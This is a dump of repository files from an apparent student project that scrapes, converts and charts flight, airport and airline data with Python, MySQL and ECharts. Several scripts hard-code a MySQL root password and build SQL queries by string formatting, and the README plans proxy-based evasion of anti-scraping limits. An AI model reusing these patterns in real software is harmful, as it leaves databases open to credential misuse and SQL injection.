..]`中行末的逗号以及`{date1:[{name:str, value:int}, ..], ..} `最后一个list后面的逗号都删掉\n- 最后通过配置根目录下的realtime.html 文件 以及JavaScripts文件夹中的realtime.js,获得可视化界面\n- 通过可视化界面可以直观地看出数据中隐藏的信息。\n- **注1: 可能需要修改源文件中的mysql密码才能在别的电脑上正确执行数据库相关的程序!**\n- **注2:鉴于本次作品的特殊性,根目录下的两个.html文件就是最终成果,不能打包**\n- 注3:由于爬虫爬下来的数据存在本地mysql数据库中,若要查看数据,则需要使用data目录下的information.sql文件导入数据对其进行查看 \n- 注4:开启win10的颜色滤镜中的红-绿(红色弱, 红色盲)滤镜,对可视化界面的色彩的体验更佳\n\n### 后续计划\n\n- 加强反反爬虫功能,使用IP代理伪装,以便更快速地获取数据,提高查询效率,并且获得更多数据以支持更多数据分析维度\n- 搭建动态页面,将上述所有功能通过自动化处理使得已有的可视化图表每天自动更新(由于无需修改图表以及数据的存储结构、查询方式,因此没有涉及必须修改源代码的部分)\n- 添加查询功能以及利用机器学习实现航班延误预测功能\n\n### 收获与心得\n\n\t第一次尝试复数语言(HTML, Python, JavaScript)与数据库、第三方框架的配合,以及手动实现爬虫,实际练习了数据库的时候和爬虫的实现,这两两者是我之前只在书上学习过概念而没有应用到实际的。初步了解数据可视化和数据分析的知识和动态网页的概念,这为我搭建一个正式的网站(而非一个简单的网页)以及学习数据的分析和可视化打下良好的基础,同时完全自主的选题和从无到有的实现过程为我以后自己开发软件和网站甚至高科技创新打下基础。此外,我还体会到如何实时地学习知识以完成手头上的项目,也就是边学边做,而非像以往一样做好所有准备才开始做项目,这很重要,因为知识是无穷的,不可能所有的项目都等学习完所有知识再去做,只有按需学习才能更好地发展。\n\n\n\n**Appendix**:\n\n\tPython依赖库:bs4, urllib, pandas, numpy, lxml, re, time, pymysql, sys\n\n\tJavaScript: Echarts, Echarts_GL"
},
{
"alpha_fraction": 0.36817991733551025,
"alphanum_fraction": 0.37637096643447876,
"avg_line_length": 29.740087509155273,
"blob_id": "7cd73c134a6eb6c1e34122761875217061bc91eb",
"content_id": "8fb6dbf33a4c2afd2bc78d3a527bb5a83f61fb89",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7275,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 227,
"path": "/datToJSONAndCSV.py",
"repo_name": "khunkin/Flight_Data_Analysis_And_Visualization",
"src_encoding": "UTF-8",
"text": "import pandas as pd\r\nimport numpy as np\r\nimport re\r\n\r\ndef seperate(line):\r\n l = []\r\n s = ''\r\n hasQuotation = False\r\n commas = 1\r\n i = 0\r\n while i < len(line):\r\n\r\n if line[i] == ',' and hasQuotation == False:\r\n l.append(s)\r\n s = ''\r\n commas += 1\r\n else:\r\n if line[i] == '\"':\r\n hasQuotation = not hasQuotation\r\n elif line[i] == '\\\\':\r\n s = ''.join([s, line[i:i+2]])\r\n i += 1\r\n else:\r\n s = ''.join([s, line[i]])\r\n i += 1\r\n if len(s) != 0:\r\n l.append(s)\r\n while len(l) < commas:\r\n l.append('')\r\n return l\r\n\r\n#按类存放在\r\ndef extract(file_name):\r\n file = open('data\\\\'+file_name, 'rt', encoding = 'utf-8')\r\n\r\n lines = file.readlines()\r\n\r\n # string 里可能会有comma啊啊啊....\r\n # 得自己手动分离数据\r\n line = seperate(lines[0].rstrip())\r\n num_of_features = len(line)\r\n datas = [[] for i in range (num_of_features)]\r\n\r\n for line in lines:\r\n temp_data = seperate(line.rstrip())\r\n\r\n for i in range(num_of_features):\r\n try:\r\n name = temp_data[i]\r\n except:\r\n print(num_of_features, temp_data)\r\n try:\r\n datas[i].append(\r\n name[1:len(name)-1]\r\n if name.startswith('\"') and name.endswith('\"')\r\n else name\r\n )\r\n except:\r\n print(\"Wrong data!\")\r\n return datas\r\n\r\n#generate CSV\r\ndef generate_CSV(data, key, file_name):\r\n dataframe = pd.DataFrame({key[i]:data[i] for i in range (len(key))})\r\n dataframe.to_csv(\"data\\\\\"+file_name+\".csv\",index=False,sep=',')\r\n\r\n#generate real JSON file\r\ndef generate_JSON(data, key, file_name):\r\n print(file_name)\r\n f = open(\"data\\\\\"+file_name+\".json\",'w',encoding=\"utf-8\")\r\n f.writelines('[\\n')\r\n\r\n length = len(data[0])\r\n\r\n for ds in data:\r\n if ds[0].find('.') >= 0 and ds[0][0].isdigit():\r\n for i in range (length):\r\n ds[i] = np.float64(ds[i])\r\n elif ds[0].isdigit() or (ds[0].find('-') == 0 and ds[0][1:].isdigit()):\r\n con = False\r\n for i in range (length):\r\n if ds[i].find('.') >=0:\r\n con = True\r\n break\r\n if con == True:\r\n for i in range (length):\r\n if ds[i] == '\\\\N':\r\n ds[i] = 'null'\r\n else:\r\n ds[i] = np.float64(ds[i])\r\n else:\r\n for i in range (length):\r\n if ds[i] == '\\\\N':\r\n ds[i] = 'null'\r\n else:\r\n ds[i] = int(ds[i])\r\n else:\r\n for i in range (length):\r\n if ds[i] == '\\\\N':\r\n ds[i] = 'null'\r\n else:\r\n ds[i] = ''.join(['\\\"', ds[i], '\\\"'])\r\n\r\n # print([data[i][0] for i in range(len(key))])\r\n for i in range (len(key)):\r\n key[i] = ''.join(['\\\"',key[i],'\\\"'])\r\n data_len = len(data[0])\r\n for i in range (data_len):\r\n dic = '{'\r\n for j in range(len(key)):\r\n dic = ' '.join([dic,''.join([key[j],':',str(data[j][i]),', '])])\r\n if dic[-2] == ',' and dic[-1] == ' ':\r\n dic = dic[:len(dic)-2]\r\n dic = ''.join([dic, '},\\n' if i < data_len-1 else '}\\n'])\r\n f.writelines(dic)\r\n f.writelines(']')\r\n\r\n\r\n#generate fake JSON-----a .js file\r\n# 需要手动去除双斜杠 以及 将 '\\\"' 换成 '\\''\r\ndef generate_fake_JSON(data, key, file_name):\r\n print(file_name)\r\n f = open(\"data\\\\\"+file_name+\".js\",'w',encoding=\"utf-8\")\r\n f.writelines(file_name +' = \\'[\\\\\\n')\r\n\r\n length = len(data[0])\r\n\r\n for ds in data:\r\n if ds[0].find('.') >= 0 and ds[0][0].isdigit():\r\n for i in range (length):\r\n ds[i] = np.float64(ds[i])\r\n elif ds[0].isdigit() or (ds[0].find('-') == 0 and ds[0][1:].isdigit()):\r\n con = False\r\n for i in range (length):\r\n if ds[i].find('.') >=0:\r\n con = True\r\n break\r\n if con == True:\r\n for i in range (length):\r\n if ds[i] == '\\\\N':\r\n ds[i] = 'null'\r\n else:\r\n ds[i] = np.float64(ds[i])\r\n else:\r\n for i in range (length):\r\n if ds[i] == '\\\\N':\r\n ds[i] = 'null'\r\n else:\r\n ds[i] = int(ds[i])\r\n else:\r\n for i in range (length):\r\n if ds[i].find(\"\\'\")>=0:\r\n index = ds[i].find('\\'')\r\n try:\r\n ds[i] = ''.join([ds[i][:index],'\\\\',ds[i][index:]])\r\n except:\r\n print([ds[i][:index],'\\\\',ds[i][index:]])\r\n exit(1)\r\n if ds[i] == '\\\\N':\r\n ds[i] = 'null'\r\n else:\r\n ds[i] = ''.join(['\\\"', ds[i], '\\\"'])\r\n\r\n # print([data[i][0] for i in range(len(key))])\r\n for i in range (len(key)):\r\n key[i] = ''.join(['\\\"',key[i],'\\\"'])\r\n data_len = len(data[0])\r\n for i in range (data_len):\r\n dic = '{'\r\n for j in range(len(key)):\r\n dic = ' '.join([dic,''.join([key[j],':',str(data[j][i]),', '])])\r\n if dic[-2] == ',' and dic[-1] == ' ':\r\n dic = dic[:len(dic)-2]\r\n dic = ''.join([dic, '},\\\\\\n' if i < data_len-1 else '}\\\\\\n'])\r\n f.writelines(dic)\r\n f.writelines(']\\';')\r\n\r\n\r\ndatasets = []\r\ndatasets.append({'file_name':'airports',\r\n 'key':['Airport ID',\r\n 'Name',\r\n 'City',\r\n 'Country',\r\n 'IATA',\r\n 'ICAO',\r\n 'Latitude',\r\n 'Longitude',\r\n 'Altitude',\r\n 'Timezone',\r\n 'DST',\r\n 'Tz',\r\n 'Type',\r\n 'Source'],\r\n })\r\ndatasets.append({'file_name':'airlines',\r\n 'key':['Airline ID',\r\n 'Name',\r\n 'Alias',\r\n 'IATA',\r\n 'ICAO',\r\n 'Callsign',\r\n 'Country',\r\n 'Active'],\r\n })\r\ndatasets.append({'file_name':'routes',\r\n 'key':['Airline ID',\r\n 'Source airport',\r\n 'Source airport ID',\r\n 'Destination airport',\r\n 'Destination airport ID',\r\n 'Codeshare',\r\n 'Stops',\r\n 'Equipment'],\r\n })\r\ndatasets.append({'file_name':'planes',\r\n 'key':['IATA code',\r\n 'ICAO code'],\r\n })\r\n\r\n\r\n# format of datas = [[feature1], [feature2],...]\r\nfor dataset in datasets:\r\n datas = extract(dataset['file_name']+'.dat')\r\n\r\n # generate_CSV(datas, dataset['key'], dataset['file_name'])\r\n generate_fake_JSON(datas, dataset['key'], dataset['file_name'])"
},
{
"alpha_fraction": 0.470459520816803,
"alphanum_fraction": 0.5251641273498535,
"avg_line_length": 24.843137741088867,
"blob_id": "e60a96e1b276edd7496592e818f922cee1a08142",
"content_id": "a7a21a7654ddbbbc0b1832aadc672c64ca45bee6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1371,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 51,
"path": "/fix_realtime_data.py",
"repo_name": "khunkin/Flight_Data_Analysis_And_Visualization",
"src_encoding": "UTF-8",
"text": "import pymysql as sql\r\n\r\n#time1 and time2 is int\r\ndef sub_time(time1, time2):\r\n if time2 == -1:\r\n return -1\r\n h1 = time1 // 100\r\n h2 = time2 // 100\r\n # just can be ude for the route : PEK to CAN \r\n if h2<5 and h1 > 20:\r\n h2 += 24\r\n if h1 < 5 and h2 > 20:\r\n h1 += 24\r\n m1 = time1 % 100\r\n m2 = time2 % 100\r\n m = m2 - m1\r\n h = h2 - h1\r\n if h > 0 and m < 0:\r\n m += 60\r\n h -= 1\r\n print(time1, time2)\r\n print('h='+str(h)+'\\tm='+str(m))\r\n return h*60+m\r\n\r\n\r\nconn = sql.connect(host='127.0.0.1',\r\n user = 'root',\r\n password='123456',\r\n db='mysql',\r\n charset='utf8')\r\ncur = conn.cursor()\r\n\r\ncmd = \"USE flights_realtime\"\r\ncur.execute(cmd)\r\n\r\n# when writing this program, we have 591 rows in the sql\r\n# delay' unit is minute for easy comparision \r\nfor id in range (1, 592):\r\n cmd = \"SELECT aplan, areal FROM information WHERE ID = %d;\"%(id)\r\n cur.execute(cmd)\r\n row = cur.fetchone()\r\n delay = sub_time(int(row[0]), int(row[1]))\r\n\r\n cmd = \"UPDATE `flights_realtime`.`information` SET `delayTime`=%d WHERE `ID`=%d;\"%(delay, id)\r\n print(cmd)\r\n cur.execute(cmd)\r\n conn.commit()\r\n\r\n\r\n# the grammar of update data in mysql\r\n# UPDATE `flights_realtime`.`information` SET `delayTime`='-39' WHERE `ID`='1';\r\n\r\n"
},
{
"alpha_fraction": 0.293002188205719,
"alphanum_fraction": 0.31683167815208435,
"avg_line_length": 24.251100540161133,
"blob_id": "7818bf61dd83ca514048aae5bd1445259e3bcf63",
"content_id": "b849d7b76a2f7815b27f98f0c8fe42c981691e2e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 6051,
"license_type": "permissive",
"max_line_length": 147,
"num_lines": 227,
"path": "/JavaScripts/airports_and_airlines.js",
"repo_name": "khunkin/Flight_Data_Analysis_And_Visualization",
"src_encoding": "UTF-8",
"text": "\r\nfunction showTimezone (data) {\r\n var myChart = echarts.init(document.getElementById('main2'));\r\n \r\n \r\n option = {\r\n title : {\r\n text: '各时区机场数量',\r\n },\r\n tooltip : {\r\n trigger: 'axis',\r\n axisPointer : { // 坐标轴指示器,坐标轴触发有效\r\n type : 'shadow' // 默认为直线,可选为:'line' | 'shadow'\r\n },\r\n formatter: function (params){\r\n return \"Timezone : \" + params[0].name + '<br/>'\r\n + params[0].seriesName + ' : ' + params[0].value + '<br/>'\r\n }\r\n },\r\n toolbox: {\r\n show : true,\r\n feature : {\r\n mark : {show: true},\r\n dataView : {show: true, readOnly: false},\r\n restore : {show: true},\r\n saveAsImage : {show: true}\r\n }\r\n },\r\n calculable : true,\r\n xAxis : [\r\n {\r\n type : 'category',\r\n data : ['-12','-11','-10','-9','-8','-7','-6','-5','-4','-3','-2','-1','0','1','2','3','4','5','6','7','8','9','10','11','12','13']\r\n }\r\n ],\r\n yAxis : [\r\n {\r\n type : 'value',\r\n boundaryGap: [0, 0.1]\r\n }\r\n ],\r\n series : [\r\n {\r\n name:'Number of Airports',\r\n type:'bar',\r\n stack: 'sum',\r\n barCategoryGap: '0%',\r\n itemStyle: {\r\n normal: {\r\n color: 'pink',\r\n label : {\r\n show: true, position: 'top'\r\n }\r\n }\r\n },\r\n data:data,\r\n },\r\n {\r\n name:'Number',\r\n type:'line',\r\n symbol: 'none',\r\n smooth: 0,\r\n color:['#66AEDE'],\r\n data:data,\r\n }\r\n ]\r\n };\r\n myChart.setOption(option)\r\n}\r\n\r\n\r\n\r\n\r\nfunction Longitude_Aatitude_Altitude (data, Acolor) {\r\n var myChart = echarts.init(document.getElementById('main1'));\r\n \r\n \r\n myChart.setOption({\r\n \r\n visualMap: {\r\n\r\n show: false,\r\n calculable: true,\r\n realtime: false,\r\n max: 3000,\r\n inRange: {\r\n color:['#a50026', '#d73027', '#f46d43', '#fdae61', '#fee090', '#ffffbf', '#e0f3f8', '#abd9e9', '#74add1', '#4575b4', '#313695']\r\n },\r\n outOfRange: {\r\n color: [\"#ddd\"]\r\n // colorAlpha: 0\r\n },\r\n\r\n // type: 'piecewise', \r\n // splitNumber:13, \r\n // max: 2000,\r\n // inRange: {\r\n // color: Acolor\r\n // },\r\n // outOfRange:{\r\n // color: [\"#ddd\"]\r\n // }\r\n },\r\n tooltip: {\r\n },\r\n xAxis3D: {\r\n name: \"经度\",\r\n type: 'value',\r\n },\r\n yAxis3D: {\r\n name: \"纬度\",\r\n type: 'value',\r\n },\r\n zAxis3D: {\r\n name: \"海拔\",\r\n type: 'value',\r\n },\r\n grid3D: {\r\n axisLine: {\r\n lineStyle: {\r\n color: '#000'\r\n }\r\n },\r\n axisPointer: {\r\n lineStyle: {\r\n color: '#f00'\r\n },\r\n show: false\r\n },\r\n viewControl: {\r\n// autoRotate: true,//旋转展示\r\n projection: 'orthographic',\r\n beta: 10\r\n },\r\n boxWidth: 300,\r\n boxHeight: 200,\r\n boxDepth: 200,\r\n top: -100\r\n },\r\n toolbox: {\r\n show : true,\r\n feature : {\r\n mark : {show: true},\r\n dataView : {show: true, readOnly: false},\r\n restore : {show: true},\r\n saveAsImage : {show: true}\r\n }\r\n },\r\n\r\n series: [\r\n {\r\n name:'scatter',\r\n type: 'scatter3D',\r\n dimensions: ['Longtitude', 'Latitude', 'Altitude'//显示框信息\r\n ],\r\n data: data,\r\n symbolSize: 3.2,\r\n symbol: 'triangle',\r\n itemStyle: {\r\n borderWidth: 1,\r\n borderColor: 'rgba(255,255,255,0.8)'\r\n },\r\n emphasis: {\r\n itemStyle: {\r\n color: '#ccc'\r\n }\r\n },\r\n itemStyle: {\r\n color: '#b0f'\r\n }\r\n }\r\n ],\r\n backgroundColor: \"#fff\"\r\n });\r\n}\r\n\r\n\r\n// ============================================================\r\n\r\n\r\nfunction Airline_Country_Active(data){\r\n var myChart = echarts.init(document.getElementById('main3'));\r\n \r\n\r\n myChart.setOption({\r\n backgroundColor: \"#ffffff\",\r\n color: [\"#FF9F7F\", \"#37A2DA\"],\r\n legend: {\r\n data: ['non-Active', 'Active']\r\n },\r\n grid: {\r\n containLabel: true\r\n },\r\n xAxis: [{\r\n type: 'value'\r\n }],\r\n yAxis: [{\r\n type: 'category',\r\n axisTick: {\r\n show: false\r\n },\r\n data: data[0]\r\n }],\r\n series: [{\r\n name: 'Active',\r\n type: 'bar',\r\n stack: 'total',\r\n label: {\r\n normal: {\r\n show: true,\r\n position: 'right'\r\n }\r\n },\r\n data: data[1]\r\n }, {\r\n name: 'non-Active',\r\n type: 'bar',\r\n stack: 'total',\r\n label: {\r\n normal: {\r\n show: true,\r\n position: 'left'\r\n }\r\n },\r\n data: data[2]\r\n }]\r\n })\r\n}"
},
{
"alpha_fraction": 0.4255101978778839,
"alphanum_fraction": 0.45306122303009033,
"avg_line_length": 22.19753074645996,
"blob_id": "c245f304ca6ffec16de2be6132f53d657a3702bf",
"content_id": "ac306842beec614ff810d30acc30e82bde895bc2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3932,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 162,
"path": "/1987toSQL.py",
"repo_name": "khunkin/Flight_Data_Analysis_And_Visualization",
"src_encoding": "UTF-8",
"text": "import pandas as pd\r\nimport pymysql as sql\r\nimport numpy as np\r\n\r\n\r\n\r\nconn = sql.connect(host='127.0.0.1',\r\n user = 'root',\r\n password='123456',\r\n db='mysql',\r\n charset='utf8')\r\ncur = conn.cursor()\r\n\r\ncmd = \"USE 1987csv\"\r\ncur.execute(cmd)\r\n\r\ntry:\r\n cmd = \"DROP TABLE flights\"\r\n cur.execute(cmd)\r\nexcept:\r\n pass\r\n\r\ncmd = (\r\n 'CREATE TABLE flights('\r\n '`Year` INT,'\r\n '`Month` INT,'\r\n '`DayofMonth` INT,'\r\n '`DayOfWeek` INT,'\r\n '`DepTime` VARCHAR(4),'\r\n '`CRSDepTime` VARCHAR(4),'\r\n '`ArrTime` VARCHAR(4),'\r\n '`CRSArrTime` VARCHAR(4),'\r\n '`UniqueCarrier` VARCHAR(8),'\r\n '`FlightNum` INT,'\r\n '`TailNum` VARCHAR(10),'\r\n '`ActualElapsedTime` FLOAT,'\r\n '`CRSElapsedTime` FLOAT,'\r\n '`AirTime` FLOAT,'\r\n '`ArrDelay` FLOAT,'\r\n '`DepDelay` FLOAT,'\r\n '`Origin` VARCHAR(3),'\r\n '`Dest` VARCHAR(3),'\r\n '`Distance` FLOAT,'\r\n '`TaxiIn` FLOAT,'\r\n '`TaxiOut` FLOAT,'\r\n '`Cancelled` INT,'\r\n '`CancellationCode` VARCHAR(1),'\r\n '`Diverted` FLOAT,'\r\n '`CarrierDelay` FLOAT,'\r\n '`WeatherDelay` FLOAT,'\r\n '`NASDelay` FLOAT,'\r\n '`SecurityDelay` FLOAT,'\r\n '`LateAircraftDelay` FLOAT'\r\n ')')\r\ncur.execute(cmd)\r\n\r\ndata = pd.read_csv(r'data\\1987.csv', dtype={\r\n 'Year': int,\r\n 'Month': int,\r\n 'DayofMonth': int,\r\n 'DayOfWeek': int,\r\n 'DepTime': str,\r\n\r\n 'CRSDepTime': str,\r\n 'ArrTime': str,\r\n 'CRSArrTime': str,\r\n 'UniqueCarrier': str,\r\n 'FlightNum': int,\r\n\r\n 'TailNum': str,\r\n 'ActualElapsedTime': np.float64,\r\n 'CRSElapsedTime': np.float64,\r\n 'AirTime': np.float64,\r\n 'ArrDelay': np.float64,\r\n\r\n 'DepDelay': np.float64,\r\n 'Origin': str,\r\n 'Dest': str,\r\n 'Distance': np.float64,\r\n 'TaxiIn': np.float64,\r\n\r\n 'TaxiOut': np.float64,\r\n 'Cancelled': int,\r\n 'CancellationCode': str,\r\n 'Diverted': np.float64,\r\n 'CarrierDelay': np.float64,\r\n\r\n 'WeatherDelay': np.float64,\r\n 'NASDelay': np.float64,\r\n 'SecurityDelay': np.float64,\r\n 'LateAircraftDelay': np.float64,\r\n})\r\nreader = np.array(data.loc[:,:])\r\n\r\n\r\n# 逐行读逐行传\r\npre_head = (\r\n'INSERT INTO flights('\r\n 'Year, '\r\n 'Month, '\r\n 'DayofMonth, '\r\n 'DayOfWeek, '\r\n 'DepTime, '\r\n 'CRSDepTime, '\r\n 'ArrTime, '\r\n 'CRSArrTime, '\r\n 'UniqueCarrier, '\r\n 'FlightNum, '\r\n 'TailNum, '\r\n 'ActualElapsedTime, '\r\n 'CRSElapsedTime, '\r\n 'AirTime, '\r\n 'ArrDelay, '\r\n 'DepDelay, '\r\n 'Origin, '\r\n 'Dest, '\r\n 'Distance, '\r\n 'TaxiIn, '\r\n 'TaxiOut, '\r\n 'Cancelled, '\r\n 'CancellationCode, '\r\n 'Diverted, '\r\n 'CarrierDelay, '\r\n 'WeatherDelay, '\r\n 'NASDelay, '\r\n 'SecurityDelay, '\r\n 'LateAircraftDelay'\r\n ') VALUES ('\r\n)\r\n\r\nlength_Info = len(reader[0])\r\nstr_type = type('1')\r\nnan_type = type(np.float64('nan'))\r\ncnt=0\r\nprint(2)\r\ntry:\r\n for info in reader:\r\n for i in range(length_Info):\r\n try:\r\n if type(info[i])==str_type:\r\n info[i] = '\\''+info[i]+'\\''\r\n if np.isnan(info[i]):\r\n info[i] = 'NULL'\r\n except:\r\n pass\r\n cmd = pre_head+(\r\n '{0}, {1}, {2}, {3}, {4}, '\r\n '{5}, {6}, {7}, {8}, {9}, '\r\n '{10}, {11}, {12}, {13}, {14}, '\r\n '{15}, {16}, {17}, {18}, {19}, '\r\n '{20}, {21}, {22}, {23}, {24}, '\r\n '{25}, {26}, {27}, {28}'\r\n ')'\r\n ).format(*info)\r\n #print(cmd)\r\n cnt+=1\r\n print(cnt)\r\n cur.execute(cmd)\r\n cur.connection.commit()\r\nfinally:\r\n cur.close()\r\n conn.close()\r\n"
},
{
"alpha_fraction": 0.6253629922866821,
"alphanum_fraction": 0.6466602087020874,
"avg_line_length": 28.441177368164062,
"blob_id": "ca046caa0676cd3cf4084bf066a3d017c13a2af2",
"content_id": "bf8ebe22e83b525b4d049b177b1511f0392f41fc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1033,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 34,
"path": "/getNationalAirport.py",
"repo_name": "khunkin/Flight_Data_Analysis_And_Visualization",
"src_encoding": "UTF-8",
"text": "from bs4 import BeautifulSoup\r\nfrom urllib.request import urlopen\r\nimport pandas as pd\r\n\r\n## url = \"http://www.zou114.com/sanzidaima/index2.asp?gj=%D6%D0%B9%FA\"\r\n## format is {'Airport','IATA'}\r\ndef getNationalAirport(url):\r\n html = urlopen(url)\r\n bs = BeautifulSoup(html, 'lxml')\r\n href_of_airport = bs.find(name = 'p', attrs={'class': 'more150'}).find_all('a')\r\n chinaAirports = []\r\n\r\n for a in href_of_airport:\r\n chinaAirports.append({'Airport':a.get_text() ,'IATA':str(a)[21:24]})\r\n return chinaAirports\r\n\r\n\r\ndef generate_csv(chinaAirports):\r\n #save as CSV\r\n Airports = []\r\n IATA = []\r\n\r\n for i in chinaAirports:\r\n Airports.append(i['Airport'])\r\n IATA.append(i['IATA'])\r\n\r\n dataframe = pd.DataFrame({'Airport':Airports, 'IATA':IATA})\r\n dataframe.to_csv(r'data\\chinaAirports.csv', index = False,sep=',')\r\n\r\n\r\nurl = \"http://www.zou114.com/sanzidaima/index2.asp?gj=%D6%D0%B9%FA\"\r\nchinaAirports = getNationalAirport(url)\r\nprint(len(chinaAirports))\r\ngenerate_csv(chinaAirports)"
},
{
"alpha_fraction": 0.5978647470474243,
"alphanum_fraction": 0.6014235019683838,
"avg_line_length": 29.27777862548828,
"blob_id": "dc39755502b726b3eabe8a6d117f0aa4f4b63730",
"content_id": "bdc7e3a1925bd9d534c9f57bf22eeddd0597367e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1218,
"license_type": "no_license",
"max_line_length": 134,
"num_lines": 36,
"path": "/csv_to_JSON.py",
"repo_name": "khunkin/Flight_Data_Analysis_And_Visualization",
"src_encoding": "UTF-8",
"text": "import csv\r\nimport json\r\n\r\ndef csv_to_json(filename, fieldnames):\r\n csv_file = open('data\\\\'+filename+'.csv', 'r', encoding='utf-8')\r\n json_file = open('data\\\\'+filename+'.js', 'w', encoding='utf-8')\r\n\r\n reader = csv.DictReader(csv_file, fieldnames)\r\n json_file.write('var '+filename+' = [\\n')\r\n for row in reader:\r\n json_file.write('\\t')\r\n json.dump(row, json_file)\r\n json_file.write(',\\n')\r\n json_file.write('];')\r\n# 有点问题,就是最后一个元素后面会多一个comma, 需要手动去除...\r\n# 因为reader好像不能用index去做,所以没法判断是否到了最后\r\n\r\nairlines = [\r\n \"airlines\",\r\n ('Airline ID','Name','Alias','IATA','ICAO','Callsign','Country','Active')\r\n]\r\nairports = [\r\n \"airports\",\r\n ('Airport ID','Name','City','Country','IATA','ICAO','Latitude','Longitude','Altitude','Timezone','DST','Tz','Type','Source')\r\n]\r\nplanes = [\r\n \"planes\",\r\n ('IATA code','ICAO code')\r\n]\r\nroutes = [\r\n \"routes\",\r\n ('Airline ID','Source airport','Source airport ID','Destination airport','Destination airport ID','Codeshare','Stops','Equipment')\r\n]\r\n\r\nfor file in [airlines, airports, planes, routes]:\r\n csv_to_json(file[0], file[1])"
},
{
"alpha_fraction": 0.4300699234008789,
"alphanum_fraction": 0.4615384638309479,
"avg_line_length": 21.83333396911621,
"blob_id": "bbdefc213e9e095984ae30d2abd0e2c656744466",
"content_id": "9dbd84cadbc854876de549c57d7695a36ac2cdaf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 306,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 12,
"path": "/analysis1987.py",
"repo_name": "khunkin/Flight_Data_Analysis_And_Visualization",
"src_encoding": "UTF-8",
"text": "import pymysql as sql\r\nimport numpy as np\r\n\r\nconn = sql.connect(host='127.0.0.1',\r\n user = 'root',\r\n password='123456',\r\n db='mysql',\r\n charset='utf8')\r\ncur = conn.cursor()\r\n\r\n# 延误率与准点率\r\n# delay 超过20 min算\r\n"
},
{
"alpha_fraction": 0.5300255417823792,
"alphanum_fraction": 0.5606899261474609,
"avg_line_length": 30.178081512451172,
"blob_id": "b19945edf3cbc500e155ad4e0a6eea6745d0143d",
"content_id": "743acc9e58a113eb66ea3ea23a22fd7adef7d175",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4962,
"license_type": "no_license",
"max_line_length": 132,
"num_lines": 146,
"path": "/cal_realtimeData.py",
"repo_name": "khunkin/Flight_Data_Analysis_And_Visualization",
"src_encoding": "UTF-8",
"text": "import pymysql as sql\r\nimport json\r\n\r\nconn = sql.connect(host='127.0.0.1',\r\n user = 'root',\r\n password='123456',\r\n db='mysql',\r\n charset='utf8')\r\ncur = conn.cursor()\r\n\r\ncmd = \"USE flights_realtime\"\r\ncur.execute(cmd)\r\n\r\ncnt = [0]*int((210+70)/20)\r\nindex = 0\r\nfor delayTime in range (-70, 210, 20):\r\n cmd = \"SELECT COUNT(*) FROM information WHERE delayTime > %d and delayTime <= %d\"%(delayTime, delayTime+20)\r\n cur.execute(cmd)\r\n cnt[index] = cur.fetchone()[0]\r\n index += 1\r\n\r\ntotal_raw = 0\r\ncmd = \"SELECT COUNT(*) FROM information\"\r\ncur.execute(cmd)\r\ntotal_raw = cur.fetchone()[0]\r\n\r\n\r\ncompanys = set()\r\ncmd = \"SELECT company FROM information\"\r\ncur.execute(cmd)\r\nraws = cur.fetchall()\r\nfor raw in raws:\r\n companys.add(raw[0])\r\n# len(company) = 10\r\n\r\ncompanys = [\r\n '中国国航', \r\n '南方航空',\r\n '夏威夷航空公司', \r\n '东方航空', \r\n '海南航空', \r\n '美国航空', \r\n '四川航空', \r\n '达美航空公司', \r\n '深圳航空', \r\n '厦门航空'\r\n ]\r\ncompany_delay = {key:0 for key in companys}\r\n\r\n# 延误情况 信息: company ,flight_number, cond, date, delayTime\r\n# 每天各公司的延误统计\r\nday_delay = {}\r\nfor day in range (20180823, 20180832):\r\n cnt_delay = {key:0 for key in companys}\r\n for company in companys:\r\n cmd = \"SELECT COUNT(*) FROM information where company = \\\"%s\\\" and cond > 0 and date = %d\"%(company, day)\r\n cur.execute(cmd)\r\n cnt_delay[company] = cur.fetchone()[0]\r\n company_delay[company] += cnt_delay[company] \r\n day_delay[str(day)] = cnt_delay\r\nfor day in range (20180901, 20180908):\r\n cnt_delay = {key:0 for key in companys}\r\n for company in companys:\r\n cmd = \"SELECT COUNT(*) FROM information where company = \\\"%s\\\" and cond > 0 and date = %d\"%(company, day)\r\n cur.execute(cmd)\r\n cnt_delay[company] = cur.fetchone()[0]\r\n company_delay[company] += cnt_delay[company] \r\n day_delay[str(day)] = cnt_delay\r\n\r\n\r\n# 出来的数据手动调一下comma就好\r\n# 需要的格式:\r\n# {date:[{name:str, value:int}, ..], .. }\r\n# 每天每个公司的延误情况\r\ndef generate_day_delay(day_delay):\r\n f = open(r\"data\\day_delay.js\", 'wt', encoding='utf-8')\r\n f.writelines(\"var day_delay = \\'{\\\\\\n\")\r\n print(day_delay.keys())\r\n for day in day_delay.keys():\r\n tmp = \"\\\"%s\\\":[\"%(day)\r\n for comp in companys:\r\n tmp += '{\\\"name\\\":\\\"%s\\\", \\\"value\\\":%d},'%(comp, day_delay[day][comp])\r\n tmp += '],\\\\\\n'\r\n f.writelines(tmp)\r\n f.writelines(\"}\\';\")\r\n\r\n\r\ndef generate_company_delay(company_delay, companys):\r\n f = open(r\"data\\company_delay.js\", 'wt', encoding='utf-8')\r\n f.writelines(\"var company_delay = [\")\r\n for comp in companys:\r\n f.writelines('%d, '%(company_delay[comp]))\r\n f.writelines(\"];\")\r\n\r\n# 可用于预测 \r\n\r\n\r\n\r\n# 昨天的出发和到达,双折线图/ 以延误区间为interval的时间轴\r\n# 什么时候出发的飞机最容易延误\r\nevery_day_delay = {}\r\ntimezone = [str(i) for i in range (0, 2400, 100)]\r\nall_day_delay = {key:0 for key in timezone}\r\n\r\n\r\nfor day in range (20180823, 20180832):\r\n cnt_delay = {key:0 for key in timezone}\r\n for dreal in 